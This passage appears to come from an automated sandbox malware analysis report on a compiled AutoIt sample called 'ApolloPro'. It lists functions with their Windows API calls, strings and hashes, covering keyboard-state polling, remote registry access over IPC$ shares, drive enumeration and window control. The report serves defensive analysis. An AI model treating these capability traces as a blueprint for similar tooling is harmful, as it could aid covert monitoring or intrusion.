                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2751501086-0
                                                                                              • Opcode ID: d66a64f2bbf7447af1346137b45bc0cc039aba55973167211c32f8eac6da64f3
                                                                                              • Instruction ID: e1f607e7de02ed426b79347514430cfe264235577f0ece847abd3791bacff5e9
                                                                                              • Opcode Fuzzy Hash: d66a64f2bbf7447af1346137b45bc0cc039aba55973167211c32f8eac6da64f3
                                                                                              • Instruction Fuzzy Hash: 0971E030644605BFFB60AB54CC89FEABF6BFF04364F10461AFA25662E1C7B16854DB90
                                                                                              Function 0069AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?,006C0980), ref: 0069AF4E
                                                                                              • GetDriveTypeW.KERNEL32(00000061,006EB5F0,00000061), ref: 0069B018
                                                                                              • _wcscpy.LIBCMT ref: 0069B042
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                              • String ID: L,l$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2820617543-2287776679
                                                                                              • Opcode ID: 6e95ec46772dbfbfd5823a83b5049bb6ca7e9bc0e4270744686413fff07e93c1
                                                                                              • Instruction ID: af487fe297e251e83f953447e29e3b0de61071134d7b2b52bdef58a0de8a1372
                                                                                              • Opcode Fuzzy Hash: 6e95ec46772dbfbfd5823a83b5049bb6ca7e9bc0e4270744686413fff07e93c1
                                                                                              • Instruction Fuzzy Hash: 3A51DE701083059BCB50EF54D992AAFB7EBEF91300F10491DF895476A2EB31ED09CA86
                                                                                              Function 006883FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • _memset.LIBCMT ref: 00688489
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006884BE
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006884DA
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006884F6
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00688520
                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00688548
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00688553
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00688558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 1411258926-22481851
                                                                                              • Opcode ID: 041b37b8c1afad1250f7b392d90a461070ba14d31aaec9ff56c027bf6e983a2a
                                                                                              • Instruction ID: f56ab539725f90ed17280033cd01666f4f1d3279f9d5fc5a9853c3f9d7a5342b
                                                                                              • Opcode Fuzzy Hash: 041b37b8c1afad1250f7b392d90a461070ba14d31aaec9ff56c027bf6e983a2a
                                                                                              • Instruction Fuzzy Hash: 50410572C1022DABDF11EBA4DC95DEEBBBAFF05340F404129E905A7261EB309E44CB90
                                                                                              Function 006B147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 3964851224-909552448
                                                                                              • Opcode ID: 745e865d614272c2764a9f2cf8b7383c5dbb0f3c512e13848e0cf9735449bdb4
                                                                                              • Instruction ID: ae316b9602532f5c4f87a11dadd472bc49f65b2b094e21f97ac2069e4bdbbf0e
                                                                                              • Opcode Fuzzy Hash: 745e865d614272c2764a9f2cf8b7383c5dbb0f3c512e13848e0cf9735449bdb4
                                                                                              • Instruction Fuzzy Hash: F8419FB251025ADBDF50EF50D960AEA3737BF52310FA00518FC524B292DB30EE9ACB50
                                                                                              Function 00695882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                                • Part of subcall function 0064153B: _memmove.LIBCMT ref: 006415C4
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006958EB
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00695901
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00695912
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00695924
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00695935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2279737902-1007645807
                                                                                              • Opcode ID: 9a624cac2fe9bb424f72327514f0f68eda760778284bf8c3730e71f389108d9b
                                                                                              • Instruction ID: 2924e4933007fe1ae1498ca6bf1b3c678bb41a17b1960b1944b08a3ef2bf1400
                                                                                              • Opcode Fuzzy Hash: 9a624cac2fe9bb424f72327514f0f68eda760778284bf8c3730e71f389108d9b
                                                                                              • Instruction Fuzzy Hash: F411C4319512ADB9EB20A7A2DC5ADFF7B7EEBD2B50F400429B405A60D0EE701D45CAA4
                                                                                              Function 00694C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 208665112-3771769585
                                                                                              • Opcode ID: c8156327357d4ebdce0d1e888cb20c5631a07f60aa6d34a979bfbf9320c6de47
                                                                                              • Instruction ID: 93616cbae225700c92cd22bd5b6662e6fa7686187fa5f2ac96431e464c09ef64
                                                                                              • Opcode Fuzzy Hash: c8156327357d4ebdce0d1e888cb20c5631a07f60aa6d34a979bfbf9320c6de47
                                                                                              • Instruction Fuzzy Hash: 03116632505109EFDF90AB209C4AEEE77BEDF41712F0001AAF404A6291EF70D9868BA0
                                                                                              Function 00695530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00695535
                                                                                                • Part of subcall function 00650859: timeGetTime.WINMM(?,00000002,0063C22C), ref: 0065085D
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00695561
                                                                                              • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00695585
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006955A7
                                                                                              • SetActiveWindow.USER32 ref: 006955C6
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006955D4
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 006955F3
                                                                                              • Sleep.KERNEL32(000000FA), ref: 006955FE
                                                                                              • IsWindow.USER32 ref: 0069560A
                                                                                              • EndDialog.USER32(00000000), ref: 0069561B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: ddef741f1ac1ed499d5cdd70f2d44a1a4f7809c78273cff5e579c49a5e0de82f
                                                                                              • Instruction ID: 093ad7ca5bb49f8e3a6ecf8e55c139ba92823429a110c9991c8151ed0956cb0d
                                                                                              • Opcode Fuzzy Hash: ddef741f1ac1ed499d5cdd70f2d44a1a4f7809c78273cff5e579c49a5e0de82f
                                                                                              • Instruction Fuzzy Hash: 4F2149B0204A04AFFF825FA4ED89E363B6FEB44345F553018F402826B1DA719D51DB61
                                                                                              Function 0069DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • CoInitialize.OLE32(00000000), ref: 0069DC2D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0069DCC0
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0069DCD4
                                                                                              • CoCreateInstance.OLE32(006C3D4C,00000000,00000001,006EB86C,?), ref: 0069DD20
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0069DD8F
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0069DDE7
                                                                                              • _memset.LIBCMT ref: 0069DE24
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0069DE60
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0069DE83
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0069DE8A
                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0069DEC1
                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0069DEC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1246142700-0
                                                                                              • Opcode ID: 1e6b40483412c3b91f34c702c6a397ea2f2901f9ccedd1aaf30240151c51d021
                                                                                              • Instruction ID: f0c3c0ba339682a2edafa38ca7ba2d120a58180ba6e70c38b6bc66548f1044fd
                                                                                              • Opcode Fuzzy Hash: 1e6b40483412c3b91f34c702c6a397ea2f2901f9ccedd1aaf30240151c51d021
                                                                                              • Instruction Fuzzy Hash: 24B1D975A00109EFDB44DFA4C889DAEBBBAEF48304F148469E905EB351DB31EE45CB94
                                                                                              Function 0069081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00690896
                                                                                              • SetKeyboardState.USER32(?), ref: 00690901
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00690921
                                                                                              • GetKeyState.USER32(000000A0), ref: 00690938
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00690967
                                                                                              • GetKeyState.USER32(000000A1), ref: 00690978
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 006909A4
                                                                                              • GetKeyState.USER32(00000011), ref: 006909B2
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 006909DB
                                                                                              • GetKeyState.USER32(00000012), ref: 006909E9
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00690A12
                                                                                              • GetKeyState.USER32(0000005B), ref: 00690A20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 1aa3f0849bb2c7ed06a11456c909c7ea203f1b034232b8afcb856a1b03d5149d
                                                                                              • Instruction ID: c5f01247b1e76ca42c3409c55ba0fd54063349f997b91a51f395d84e76ec0486
                                                                                              • Opcode Fuzzy Hash: 1aa3f0849bb2c7ed06a11456c909c7ea203f1b034232b8afcb856a1b03d5149d
                                                                                              • Instruction Fuzzy Hash: BA51DA20A047892DFF34DBB045107EABFBE9F01780F48459DD5C25BAC3DA649A4CCBA5
                                                                                              Function 0068CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0068CE1C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CE2E
                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0068CE8C
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0068CE97
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CEA9
                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0068CEFD
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CF0B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CF1C
                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0068CF5F
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0068CF6D
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0068CF8A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0068CF97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: ada1d7d44624c4c2ba249ec241f4018c2b400a681dfe067a4c8c3b1db4140d02
                                                                                              • Instruction ID: c3f82d452e4cc6d7636bd4a08ced59510d75a288d4e42f1f83ef11ecd7e8834e
                                                                                              • Opcode Fuzzy Hash: ada1d7d44624c4c2ba249ec241f4018c2b400a681dfe067a4c8c3b1db4140d02
                                                                                              • Instruction Fuzzy Hash: FB512071B00205AFEB18DF69DD99EAEBBB6EB88710F14822DF615D7390D770AD048B50
                                                                                              Function 00632581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              • GetSysColor.USER32(0000000F), ref: 006325AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 7544cc17bf40495992515c76e85f755fcd4792333082889dd4e0832f99b646a4
                                                                                              • Instruction ID: d17450e91cd7e451ee89e24339ce111aca516340f1439a9553a6bf724c26ba39
                                                                                              • Opcode Fuzzy Hash: 7544cc17bf40495992515c76e85f755fcd4792333082889dd4e0832f99b646a4
                                                                                              • Instruction Fuzzy Hash: 9441B131004541EFDB215F689CA9BF93B67EF0A335F184265FDA68A2E1C7308D42DBA1
                                                                                              Function 006429BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00650B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00642A3E,?,00008000), ref: 00650BA7
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00642ADF
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00642C2C
                                                                                                • Part of subcall function 00643EBE: _wcscpy.LIBCMT ref: 00643EF6
                                                                                                • Part of subcall function 0065386D: _iswctype.LIBCMT ref: 00653875
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 537147316-3738523708
                                                                                              • Opcode ID: 7ce6024e04f27d821f2c396672b46f3da144cb4b92f61e4eb64328a080e16a31
                                                                                              • Instruction ID: 9ba97b72c830b8e09495282292d787e14526c922925160efb07423dd2c3663d4
                                                                                              • Opcode Fuzzy Hash: 7ce6024e04f27d821f2c396672b46f3da144cb4b92f61e4eb64328a080e16a31
                                                                                              • Instruction Fuzzy Hash: 9602B2301083419FC7A4EF24C891AAFBBE7EF95314F50491DF499972A2DB30DA89CB56
                                                                                              Function 00634D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __i64tow__itow__swprintf
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              • API String ID: 421087845-2263619337
                                                                                              • Opcode ID: 0ece7bdceb37f3c3480d003daebb68d60b50d08bfa5f91446e0ec41c90656cc0
                                                                                              • Instruction ID: 76a115561760505f5792082243dc152eaf692789c904dd45eaad61675d06b7ca
                                                                                              • Opcode Fuzzy Hash: 0ece7bdceb37f3c3480d003daebb68d60b50d08bfa5f91446e0ec41c90656cc0
                                                                                              • Instruction Fuzzy Hash: D241F571A08209AFDB64DF74D941EBAB3EAEF45300F20446EE549DB391EE31A942CB50
                                                                                              Function 006B7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006B778F
                                                                                              • CreateMenu.USER32 ref: 006B77AA
                                                                                              • SetMenu.USER32(?,00000000), ref: 006B77B9
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B7846
                                                                                              • IsMenu.USER32(?), ref: 006B785C
                                                                                              • CreatePopupMenu.USER32 ref: 006B7866
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B7893
                                                                                              • DrawMenuBar.USER32 ref: 006B789B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 176399719-3044882817
